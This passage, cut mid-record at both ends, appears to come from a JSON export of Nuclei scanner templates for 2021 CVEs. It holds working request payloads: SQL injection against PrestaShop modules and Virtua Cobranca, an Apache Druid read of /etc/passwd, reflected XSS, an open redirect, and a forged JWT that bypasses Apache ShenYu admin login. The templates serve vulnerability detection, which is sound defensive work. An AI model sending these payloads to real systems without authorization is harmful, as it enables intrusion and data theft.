cve2021,cve,redirect,novnc,seclists,openstack\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}//interact.sh/%2f..'\n\n matchers-condition: 
and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n\n - type: status\n status:\n - 302\n - 301\n# digest: 4a0a00473045022038b9f6ddbb2bec14ec5183894095d1bb6407357f4b3884a6cd3968caf9b2ff4d022100dec5cef15816ab428fbc7a300123ad1d5f0e8bb046107d7f0d4f5d869b16d70c:922c64590222798bb761d5b6d8e72950", "hash": "0305dcb6144c9224e1128054a0e712f0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308383" }, "name": "CVE-2021-36580.yaml", "content": "id: CVE-2021-36580\n\ninfo:\n name: IceWarp Mail Server - Open Redirect\n author: DhiyaneshDk\n severity: medium\n description: |\n IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by IceWarp to fix the open redirect vulnerability.\n reference:\n - https://www.icewarp.com/\n - https://twitter.com/shifacyclewala/status/1443298941311668227\n - http://icewarp.com\n - http://mail.ziyan.com\n - https://medium.com/%40rohitgautam26/cve-2021-36580-69219798231c\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-36580\n cwe-id: CWE-601\n epss-score: 0.00233\n epss-percentile: 0.60652\n cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: icewarp\n product: icewarp_server\n shodan-query: title:\"icewarp\"\n tags: cve2021,cve,icewarp,redirect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - 
'(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a0047304502201fb7d9f7f3b4cc99c307df40e242a485cec4ec2e1825cb4321b536061d94e5200221009cde712c4679e05357975cbc11bd9caaabcc6fe2ecf21d3d796c06da80f6ed32:922c64590222798bb761d5b6d8e72950", "hash": "b8bf76fa5db5765b5dbe4b393c39197f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308384" }, "name": "CVE-2021-36748.yaml", "content": "id: CVE-2021-36748\n\ninfo:\n name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection\n author: whoever\n severity: high\n description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Upgrade the PrestaHome Blog module (ph_simpleblog) to version 1.7.8 or later, or apply the vendor-provided patch; the flaw is in the module, not in PrestaShop core, so updating PrestaShop alone does not fix it.\n reference:\n - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/\n - https://alysum5.promokit.eu/promokit/documentation/blog/\n - https://blog.sorcery.ie\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36748\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-36748\n cwe-id: CWE-89\n epss-score: 0.0061\n epss-percentile: 0.78175\n cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:*\n metadata:\n max-request: 2\n vendor: prestahome\n product: blog\n framework: prestashop\n tags: cve2021,cve,prestashop,prestahome,sqli,cms\n\nhttp:\n - raw:\n - |\n GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\n Host: 
{{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 200\"\n - \"status_code_2 == 404\"\n - 'contains(body_1, \"prestashop\")'\n - \"contains(tolower(header_2), 'index.php?controller=404')\"\n - \"len(body_2) == 0\"\n condition: and\n# digest: 4a0a0047304502210086d824280f02e57da9f8e8dd279b769c0c8778ae15184ca95fba4f7d921ade7502206b3eb93275afcda1d68912cda1e9e9df0f2cf41e0153060af346b8e123a8b337:922c64590222798bb761d5b6d8e72950", "hash": "8b548460feb8a317703b902b7bfed839", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308385" }, "name": "CVE-2021-36749.yaml", "content": "id: CVE-2021-36749\n\ninfo:\n name: Apache Druid - Local File Inclusion\n author: _0xf4n9x_\n severity: medium\n description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. 
This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Apache Druid to fix the LFI vulnerability.\n reference:\n - https://github.com/BrucessKING/CVE-2021-36749\n - https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36749\n - https://lists.apache.org/thread.html/r304dfe56a5dfe1b2d9166b24d2c74ad1c6730338b20aef77a00ed2be@%3Cannounce.apache.org%3E\n - https://lists.apache.org/thread.html/r304dfe56a5dfe1b2d9166b24d2c74ad1c6730338b20aef77a00ed2be%40%3Cannounce.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-36749\n cwe-id: CWE-863\n epss-score: 0.79504\n epss-percentile: 0.98204\n cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: druid\n tags: cve2021,cve,apache,lfi,auth-bypass,druid\n\nhttp:\n - raw:\n - |\n POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - 
\"druid:*:1000:1000:\"\n condition: or\n# digest: 4a0a0047304502203323830c1d350362a1c5cd6246f4f62a3e158e16610ad18f3ebcb1d4d11ed22a022100896e444f11e41d53616e890391efd077dee3d68ac3fa1b00958001f56c6696e7:922c64590222798bb761d5b6d8e72950", "hash": "462854f7bf8bc463fac205b39dd9a030", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308386" }, "name": "CVE-2021-36873.yaml", "content": "id: CVE-2021-36873\n\ninfo:\n name: WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: |\n Update to the latest version of the WordPress iQ Block Country plugin (>=1.2.12) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/ba93f085-2153-439b-9cda-7c5b09d3ed58\n - https://wordpress.org/plugins/iq-block-country/\n - https://patchstack.com/database/vulnerability/iq-block-country-/wordpress-iq-block-country-plugin-1-2-11-authenticated-persistent-cross-site-scripting-xss-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36873\n - https://wordpress.org/plugins/iq-block-country/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-36873\n cwe-id: CWE-79\n epss-score: 0.00131\n epss-percentile: 0.47179\n cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: webence\n product: iq_block_country\n framework: wordpress\n tags: cve,cve2021,wp-plugin,iq-block-country,wordpress,wp,xss,authenticated,wpscan,webence\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n 
Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n option_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n - |\n GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(header_4, \"text/html\")\n - status_code_4 == 200\n - contains(body_4, 'blockcountry_blockmessage\\\">test')\n - contains(body_4, '

    Block type

    ')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\"'\n internal: true\n# digest: 490a004630440220684766e6e255bb9e4afa32a94b1ca2dc955141bb09fed41190b572538a9c5c2d02201338c2a3689ac3cc0f55a9edc41183f9d05cac1325b267cd51aa3d1c282ea228:922c64590222798bb761d5b6d8e72950", "hash": "cd79ac864b9cd9acd3fc73f5bc16cf5f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308387" }, "name": "CVE-2021-37216.yaml", "content": "id: CVE-2021-37216\n\ninfo:\n name: QSAN Storage Manager <3.3.3 - Cross-Site Scripting\n author: dwisiswant0\n severity: medium\n description: |\n QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability.\n reference:\n - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37216\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-37216\n cwe-id: CWE-79\n epss-score: 0.00108\n epss-percentile: 0.42604\n cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: qsan\n product: xn8024r_firmware\n tags: cve,cve2021,xss,qsan,storage\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/http_header.php\"\n\n headers:\n X-Trigger-XSS: \"\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 
\"!contains(tolower(header), 'x-xss-protection')\"\n\n - type: word\n part: body\n words:\n - '\"HTTP_X_TRIGGER_XSS\":\"\"'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 4a0a00473045022100f0eea65e7c17996e2113f9111c801fb16d0ac3d4acfb10eb860c142f5752e07c022072e9f6a7073167683e9506fd7a430aaa503a26d38e0cd53ea6ebee8661e2ced6:922c64590222798bb761d5b6d8e72950", "hash": "c452eada5b355a0fa38120547ee0e1e1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308388" }, "name": "CVE-2021-37304.yaml", "content": "id: CVE-2021-37304\n\ninfo:\n name: Jeecg Boot <= 2.4.5 - Information Disclosure\n author: ritikchaddha\n severity: high\n description: |\n An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the application.\n remediation: |\n Upgrade Jeecg Boot to a version higher than 2.4.5 to mitigate the vulnerability.\n reference:\n - https://github.com/jeecgboot/jeecg-boot/issues/2793\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37304\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-37304\n cwe-id: CWE-732\n epss-score: 0.00703\n epss-percentile: 0.79899\n cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: jeecg\n product: jeecg\n shodan-query: title:\"Jeecg-Boot\"\n fofa-query: title=\"JeecgBoot 企业级低代码平台\"\n tags: cve2021,cve,jeecg,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jeecg-boot/actuator/httptrace/\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"traces\":['\n - '\"headers\"'\n - '\"request\":{'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022079aca011c64f9f42174da4c2ac2e79327a3b7f9cb9ec87b19a1d1622f87e55f9022100c5af542979ec21dec828b8bd3914169cb6e954bef293666dacc6840bc35c6993:922c64590222798bb761d5b6d8e72950", "hash": "243f9e5f80a83322652d6956087cad0b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308389" }, "name": "CVE-2021-37305.yaml", "content": "id: CVE-2021-37305\n\ninfo:\n name: Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure\n author: ritikchaddha\n severity: high\n description: |\n Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to unauthorized access or data leakage.\n remediation: |\n Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability.\n reference:\n - https://github.com/jeecgboot/jeecg-boot/issues/2794\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37305\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-37305\n cwe-id: CWE-732\n epss-score: 0.00416\n epss-percentile: 0.73616\n cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: jeecg\n product: jeecg\n shodan-query: title:\"Jeecg-Boot\"\n fofa-query: title=\"JeecgBoot 企业级低代码平台\"\n tags: cve2021,cve,jeecg,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'username\":\"admin'\n - 'success\":true'\n - 'result\":{'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402204a660859c711b126edb6415cc095e15cfdcb553cef27e02ccc482c2310f22fa5022044fb232b8a52e45910c5e030ec95e0488cdef0e8ee9ad6fa6245217f4879d18b:922c64590222798bb761d5b6d8e72950", "hash": "0467e81c7cf3458386591852a87b6f93", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838a" }, "name": "CVE-2021-37416.yaml", "content": "id: CVE-2021-37416\n\ninfo:\n name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.\n remediation: |\n Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416\n - https://blog.stmcyber.com/vulns/cve-2021-37416/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37416\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-37416\n cwe-id: CWE-79\n epss-score: 0.00118\n epss-percentile: 0.44933\n cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zohocorp\n product: manageengine_adselfservice_plus\n shodan-query: http.title:\"ManageEngine\"\n tags: cve2021,cve,zoho,xss,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \">\"\n - \"adsf/js/\"\n condition: and\n\n - type: status\n 
status:\n - 200\n# digest: 490a00463044022044a740d43743d6c86fa99d1d71e6331299ee72fdbcb93c5f5229ef1619021774022038b22cd63d9a3535d35f2588fddc0cfbfa48e7507fadda3beef37fbc2d36a204:922c64590222798bb761d5b6d8e72950", "hash": "55284988b5e9bd4e330f0fbec56db3e4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838b" }, "name": "CVE-2021-37538.yaml", "content": "id: CVE-2021-37538\n\ninfo:\n name: PrestaShop SmartBlog <4.0.6 - SQL Injection\n author: whoever\n severity: critical\n description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.\n impact: |\n An attacker can gain unauthorized access to the database, extract sensitive information, modify data, or perform other malicious activities.\n remediation: |\n Upgrade PrestaShop SmartBlog to version 4.0.6 or later to mitigate the SQL Injection vulnerability.\n reference:\n - https://blog.sorcery.ie/posts/smartblog_sqli/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37538\n - https://classydevs.com/free-modules/smartblog/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-37538\n cwe-id: CWE-89\n epss-score: 0.02819\n epss-percentile: 0.90434\n cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:*\n metadata:\n max-request: 1\n vendor: smartdatasoft\n product: smartblog\n framework: prestashop\n tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"c5fe25896e49ddfe996db7508cf00534\"\n\n - type: 
status\n status:\n - 200\n# digest: 4a0a00473045022011cbd06cd63cb7a0c676dba12bbe41936a17f1692c6e859d452ad633dc77e77c0221009527cd2a263c8792320276643854160869ac14841d75ba7676bf0a8d3340c0b2:922c64590222798bb761d5b6d8e72950", "hash": "1a68ae11bef51188c9d536c59c8b7466", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838c" }, "name": "CVE-2021-37573.yaml", "content": "id: CVE-2021-37573\n\ninfo:\n name: Tiny Java Web Server - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2021/Aug/13\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37573\n - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt\n - http://seclists.org/fulldisclosure/2021/Aug/13\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-37573\n cwe-id: CWE-79\n epss-score: 0.00303\n epss-percentile: 0.69043\n cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tiny_java_web_server_project\n product: tiny_java_web_server\n tags: cve2021,cve,xss,tjws,java,seclists,tiny_java_web_server_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est\"\n\n matchers-condition: and\n matchers:\n - type: word\n 
part: body\n words:\n - \"

    404 test not found

    \"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 404\n# digest: 4b0a00483046022100860677e3cb649f8221c48f8da8c476eaff6ae5218cc6f264058729a4175edb3d022100cde954092485d59c153fd0f1cbf309acc275463b5deb833deb6be569958419ad:922c64590222798bb761d5b6d8e72950", "hash": "30c4ea9913fec20f95c9572f76cf91ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838d" }, "name": "CVE-2021-37580.yaml", "content": "id: CVE-2021-37580\n\ninfo:\n name: Apache ShenYu Admin JWT - Authentication Bypass\n author: pdteam\n severity: critical\n description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential compromise of the entire Apache ShenYu system.\n remediation: |\n Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37580\n - https://github.com/fengwenhua/CVE-2021-37580\n - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb\n - http://www.openwall.com/lists/oss-security/2021/11/16/1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-37580\n cwe-id: CWE-287\n epss-score: 0.91956\n epss-percentile: 0.9872\n cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: shenyu\n tags: cve2021,cve,apache,jwt,shenyu\n\nhttp:\n - raw:\n - |\n GET /dashboardUser HTTP/1.1\n Host: {{Hostname}}\n X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'query success'\n - 
'\"userName\":\"admin\"'\n - '\"code\":200'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008dc817a42d582540241a41c989a303ff874434de3f13d3696356f016dbbf7d26022078549e217e3ab9625e7da831d7b6b2071ed2f72bbeb8bc3adfa87b37e2c507e9:922c64590222798bb761d5b6d8e72950", "hash": "a97c18a1d0bb34a2aa4bafa71103ce92", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838e" }, "name": "CVE-2021-37589.yaml", "content": "id: CVE-2021-37589\n\ninfo:\n name: Virtua Software Cobranca <12R - Blind SQL Injection\n author: princechaddha\n severity: high\n description: |\n Virtua Cobranca before 12R allows blind SQL injection on the login page.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying system.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Virtua Software Cobranca <12R.\n reference:\n - https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589\n - https://www.virtuasoftware.com.br/\n - https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37589\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-37589\n cwe-id: CWE-89\n epss-score: 0.00661\n epss-percentile: 0.77395\n cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: virtuasoftware\n product: cobranca\n shodan-query: http.favicon.hash:876876147\n tags: cve,cve2021,virtua,sqli,virtuasoftware\n\nhttp:\n - raw:\n - |\n POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n - |\n POST /controller/login.php?acao=autenticar HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; 
charset=UTF-8\n X-Requested-With: XMLHttpRequest\n\n idusuario='&idsenha=test&tipousr=Usuario\n - |\n POST /controller/login.php?acao=autenticar HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n\n idusuario=''&idsenha=a&tipousr=Usuario\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_3, \"Os parametros não estão informados corretamente\")'\n - 'contains(body_3, \"O CNPJ dos parametro não está informado corretamente\")'\n condition: or\n\n - type: dsl\n dsl:\n - \"status_code_2 == 500 && status_code_3 == 200\"\n# digest: 4a0a00473045022100bd23716f1545a3d6b6f9928e16ff24594ad46444ca7f5d2b0ff5781948e287ef0220786b038ec0a0a3a94e2643bab4e9fb9f4be5dfaf7002efdc42df3856ca18feeb:922c64590222798bb761d5b6d8e72950", "hash": "3f62b9a71214f7a61f135b80417219b5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838f" }, "name": "CVE-2021-37704.yaml", "content": "id: CVE-2021-37704\n\ninfo:\n name: phpfastcache - phpinfo Resource Exposure\n author: whoever\n severity: medium\n description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.\n impact: |\n An attacker can gain access to sensitive information, such as server configuration details, PHP version, and installed extensions.\n remediation: |\n Remove or restrict access to the phpinfo.php file in the phpfastcache library.\n reference:\n - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704\n - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc\n - https://packagist.org/packages/phpfastcache/phpfastcache\n - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807\n - https://github.com/PHPSocialNetwork/phpfastcache/commit/41a77d0d8f126dbd6fbedcd9e6a82e86cdaafa51\n classification:\n 
